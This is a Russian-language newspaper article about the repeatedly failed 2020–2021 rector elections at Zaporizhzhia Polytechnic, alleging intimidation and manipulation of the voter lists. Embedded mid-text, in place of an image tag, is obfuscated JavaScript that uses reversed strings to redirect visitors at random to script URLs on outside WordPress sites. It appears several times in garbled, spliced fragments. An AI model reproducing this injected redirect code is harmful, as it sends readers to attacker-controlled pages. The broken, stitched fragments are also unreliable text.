По мнению коллектива, на сегодняшний день в НУ «Запорожская политехника» фактически утрачена структура и система взаимодействия подразделений, что привело к разбалансированию деятельности университета в целом.
Причиной этого стали непрофессиональные действия лиц, которые входят в
руководство вуза, и умышленное затягивание избирательной кампании по выборам ректора. О том, что происходит в стенах именитой Машинки, мы писали в прошлых выпусках нашей газеты, а вот как проходили выборы и кто стал причиной их срыва, мы расскажем в этом информационном обзоре.
Первые выборы ректора состоялись в конце декабря 2020 г. МОН утвердило список кандидатов из трех человек: Виктор Грешта, Эдуард Гугнин и Александр Овчинников. Первый тур выборов был проведен на 21 декабря 2020 г. Торжественное событие для любого вуза, но в случае с Машинкой эти выборы неожиданно стали сложными предвыборными технологиями, цель которых, как оказалось, привести на должность ректора конкретного кандидата – Эдуарда Гугнина.
В этот день, на участке №2, расположенном в Запорожском профессиональном колледже компьютерных технологий, произошло событие, которое затем повлияло на общий итоговый результат. Процесс голосования на участке проходил довольно оживленно и, по состоянию на 12.30, проголосовал последний избиратель из списка. Явка избирателей составила 100%. После завершения голосования председатель
избирательного участка в присутствии наблюдателей совершила консультационный звонок начальнику юридического отдела НУ «Запорожская политехника» по поводу дальнейших возможных действий комиссии в случае досрочного окончания голосования при 100% явке избирателей. Был получен ответ, что нужно, согласно п. 20 «Положения об избирательных комиссиях по выборам ректора НУ «Запорожская политехника», немедленно начать процесс подсчета голосов. Были зафиксированы следующие результаты: За Грешту – 48 голосов, за Гугнина – 1 голос, за Овчинникова – 6 голосов. Против всех проголосовал один избиратель.
Комиссия начала составлять протокол, замечаний не было. Однако буквально через 5 минут после составления протокола наблюдателю от Эдуарда Гугнина на мобильный телефон начали поступать звонки с инструкциями и требованиями немедленно прекратить составление протокола и составить жалобу на действия избирательной комиссии. Это вызвало недоумение у членов избирательной комиссии и наблюдателей. Через 20 минут на избирательном участке вместе с другим наблюдателем появился Эдуард Гугнин и в разговоре на повышенных тонах с главой избирательного участка он пытался выяснить, почему был произведен подсчет голосов. Полученные объяснения главы комиссии его не удовлетворили, и он заявил: «Бюллетени будут признаны недействительными». На следующий день в колледже компьютерных технологий произошло чрезвычайное событие – в помещение с проверкой приехала полиция, представители которой в частном разговоре не скрывали главной цели
визита – запугать руководителя и коллектив колледжа.
По результатам первого тура голосования никто из кандидатов не получил большинство, по правилам проведения выборов во второй тур, назначенный на 28
декабря, вышли Эдуард Гугнин. и Виктор Грешта. За эту неделю между первым и вторым туром от представителей коллектива колледжа компьютерных технологий поступали сообщения о звонках с угрозами и запугиванием с требованиями голосовать, как нужно. По результатам второго тура голосования, за Грешту проголосовали 634 человека, а за Гугнина – 503 человека. По существующим требованиям Виктор Грешта не мог стать избранным ректором, ему не хватало
25 голосов. В то же время привлекает внимание неестественный результат голосования на 2-м участке, где за Грешту проголосовало только 26 избирателей,
по сравнению с неделей ранее, а за Гугнина проголосовало уже 19 избирателей, против 1 голоса неделей раньше.
Вторые выборы МОН назначило на 20 апреля 2021 года. За этот период времени произошло несколько событий. Так, 2 февраля 2021 года был назначен и.о. ректора – Сергей Ярымбаш, а 23 февраля был подписан закон, который вносил изменения в Закон Украины «О высшем образовании» в части процедуры выборов ректора и вводил дополнительные механизмы более эффективного внешнего контроля над такими
выборами. На должность ректора уже претендовало 7 человек.
В университете руководством нескрываемо саботировался процесс честного проведения выборов. Как считают сотрудники вуза, Сергей Ярымбаш любыми
методами пытался продлить сроки исполняющего обязанности. Оказывая влияние на избирательный процесс, имея в своих руках административные рычаги, он требовал переноса даты выборов на более поздние сроки, мотивируя это карантинными мерами.
Были попытки с нарушением требований Постановления КМУ от 9 декабря 2020 г. №1236 (с изменениями), полностью запретить посещение университета не только соискателям высшего образования, но и всем сотрудникам, чтобы это в дальнейшем стало мотивацией для обращения в МОН о невозможности проведения выборов.
Проводилось и подстрекательство некоторых кандидатов на должность ректора, с просьбой подписать обращение в министерство о перенесении выборов из-за невозможности их проведения и малых сроков реализации предвыборной агитации. Хотя в этой ситуации в выигрыше оставался только один из кандидатов, а именно его сын Дмитрий Ярымбаш, открытое лоббирование интересов которого началось осуществляться в университете.
Состоялось значительное переформатирование списка избирателей на первом участке НУ «Запорожская политехника», где голосует основная часть избирателей. Из списка исчезла значительная часть студентов-отличников, активных представителей студенческого самоуправления. Вместо них в список избирателей попали студенты с академической задолженностью. Ликвидация этих задолженностей и послужила главным аргументом в пользу поддержки «необходимого кандидата».
В результате активных действий Сергея Ярымбаша с его неоднократными обращениями в МОН вторые выборы были перенесены на поздний срок – 18 мая
2021 г. Выборы прошли в два тура, где победителем снова стал Виктор Грешта, с результатом 571 голос против 567 у оппонента.
Однако и на этот раз ректор не был избран по требованию закона о необходимости набрать более половины голосов среди пришедших на выборы. Грешта набрал 46,54%. При анализе результатов голосования по участкам привлекло на себя голосование, проходившее на участке Токмацкого механического профессионального колледжа. Повторилась ситуация с влиянием на избирателей. Причины изменений в отношении кандидатов могут быть разными, но привлекает внимание тот факт, что именно в это время закончился контракт с директором этого колледжа, а приказ о назначении его на должность и.о. директора до объявления результатов конкурса был подписан действующим руководством университета именно в день проведения
второго тура выборов.
Следует отметить одну интересную деталь, касающуюся графы в бюллетене «Не поддерживаю ни одного кандидата». Во втором туре, вторых выборов, где было голосование за кандидатуры Грешты и Гугнина, количество таких голосов составило 87, или 7,29%. Таким образом, благодаря большому проценту проголосовавших против всех кандидатов снова не был избран ректор.
Из-за отсутствия результата МОН снова уже в третий раз назначает выборы на 21 сентября 2021 г. Между тем, временное руководство, в лице и.о. ректора и первого проректора начало активно использовать административный ресурс.
Лицам, демонстрировавшим свою лояльность к и.о. ректора Ярымбашу устанавливались денежные надбавки, планируя сокращение штата и несмотря на
финансовое положение университета, руководство начало принимать на работу в штат новых, заангажированных лиц. Без каких-либо замечаний по поводу профессиональной деятельности людей начали увольнять с руководящих должностей, а на их место принимать людей, которые до этого не работали в системе высшего образования по такой специальности и не имели опыта и необходимых компетенций для работы на этих должностях. Имели место и случаи угроз и запугивания увольнением тех, кто не поддерживал временное руководство университета.
Без соблюдения необходимых процедур была уволена с должности главный бухгалтер университета, в результате чего сейчас проходит судебный процесс против университета. Были попытки искусственно добавить должности педагогических работников в некоторых подразделениях, для увеличения числа избирателей, которые смогли бы отдать голоса за нужного кандидата.
В избирательный список третьих выборов попали четыре кандидата. Выборы прошли в два тура. Второй тур третьих выборов состоялся 28 сентября, и вновь наибольшее число голосов, 588, набрал Виктор Грешта, 49,29% от числа пришедших на выборы, а у Гугнина 505 голосов, или 42,33%. Против всех кандидатов проголосовали 87 избирателей или 7,29%. Согласно законодательству, кандидат должен был набрать более 50%, поэтому и третьи выборы не дали университету нового ректора.
22 декабря, в день, когда верстался этот номер, проходили четвертые по счету выборы ректора Машинки. На этот раз за право быть избранными боролись три кандидата Виктор Грешта, Эдуард Гугнин и Александр Овчиников. Более подробно о том, как проходили эти выборы, мы расскажем в следующем выпуске нашей газеты. Нужно отметить, что подготовка и к этому этапу выборов имела также ряд трудностей и моментов, не делающих чести одному из кандидатов на эту должность.$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to_2021-12-17_11-21-05.jpg” alt=”” width=”903″ height=”1280″ />
Несмотря на то, Виктора Грешту поддержал наблюдательный совет университета во главе с Вячеславом Богуслаевым, нынешнее руководство вуза пыталось сорвать дату выборов и даже использовать давление народных депутатов. Примером тому служит обращение народного депутата Александра Кабанова к Сергею Шкарлету, министру образования с надуманными обвинениями, которые касались списка студентов, внесенных избирателями. Только благодаря взвешенной и твердой позиции членов студенческого самоуправления выборы не были сорваны.
Андрей Бартыш
P.S. В то время, как этот номер сдавался в печать, редакции «Горожанин Информ» стало известно, что в первом туре этого избирательного марафона победу вновь одержал Виктор Грешта, опередив своего соперника Эдуарда Гугнина. Заключительный, второй тур выборов состоится 29 декабря 2021 года, и, будем надеяться, что новый 2022 год прославленная Машинка встретит с новым ректором.